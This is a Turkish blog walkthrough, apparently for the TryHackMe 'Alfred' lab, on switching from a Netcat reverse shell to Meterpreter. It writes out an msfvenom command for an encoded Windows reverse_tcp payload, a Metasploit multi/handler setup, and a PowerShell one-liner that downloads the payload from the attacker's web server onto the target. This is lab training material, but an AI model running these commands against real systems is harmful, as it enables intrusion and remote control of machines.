Netcat oturumundan Meterpreter’e Geçmek

Netcat telnet tabanlı komut çalıştırabilme ve dosya alış verişi sağlayan basit bir uygulamadır. Bu uygulama ile yeterince hareket ya da özelliğe sahip olamayız. Özellikle yetki yükseltmesi ya da daha fazla sömürü yapmak istiyorsak güçlü bir payload’a ihtiyacımız olur. Bu ihtiyacımızı Meterpreter ile karşılarız.

Gerçekleştirilen uygulama https://tryhackme.com/room/alfred makinesi üzerinde gerçekleştirilmiştir. Netcat ile bağlantı alındığı varsayılmıştır.

Powershell betiği yardımıyla reverse tcp socket açabildik. Bunun için burada ki betikden yararlanabilirsiniz. https://github.com/samratashok/nishang/blob/master/Shells/Invoke-PowerShellTcp.ps1

nc -lvnp 9001
netcat kullanmak

Ek olarak hatırlatmak isterim. CMD üzerinde değiliz hedef sistem üzerinde powershell de çalışıyoruz.

Switching Shells , Yetki yükselmeyi kolay hale getirmek için Meterpreter shell kullanacağız.

Msfvenom ile shell oluşturmak

msfvenom -p windows/meterpreter/reverse_tcp -a x86 --encoder x86/shikata_ga_nai LHOST=<ip adresini> LPORT=<port adresiniz> -f exe -o switchshell.exe
msfvenom ile encoder kullanmak
Seçtiğiniz port numarası hedef sistem ve sizin dinleyeceğiniz sistem üzerinde çakışmamalıdır.

LHOST , saldırgan ip adresidir. Yani karşı tarafda oluşturduğumu shell tetiklediğimiz zaman istek atılacak ip adresidir.

Multi Handler İle Bağlantıyı Dinlemek

msfconsole
use exploit/multi/handler
set PAYLOAD windows/meterpreter/reverse_tcp
set lhost 10.8.233.100
set lport 443
multi handler yapılandırması

Powershell yardımı ile uzak sunucudan zararlı dosyayı indirmek ve tetiklemek

powershell "(New-Object System.Net.WebClient).Downloadfile('http://10.8.233.100:80/switchshell.exe','switchshell.exe')"

‘switchshell.exe’ sizin oluşturduğunuz isim olmalıdır. Ek olarak msfvenom ile oluşturduğumuz exe dosyasının bulunduğu dizinde python -m SimpleHTTPServer 80 ile web server açılmalıdır.

Yukarıda ki komutumuzu netcat aldığımız oturuma yapıştıralım.

python simple http server kullanımı
Yapıştırdığımız komut sonrasında zararlı dosyayı almak için istek web servere geldi. Artık tek yapmamız gereken başlatmak ve multi handler alanına geçmektir.
powershell ile uzak sunucudan dosya indirmek
multi handler kullanımı

Başarılı bir şekilde Meterpreter’e geçmiş olduk.

Sizde Hackthebox ya da TryHackMe gibi bir çok platformda kullanabileceğiniz kullanışlı ipuçları ya da komutları https://www.asimmisirli.com/makine-cozumlerinde-yaygin-ipucular/ bu adresden bulabilirsiniz.

Leave a Reply

Your email address will not be published. Required fields are marked *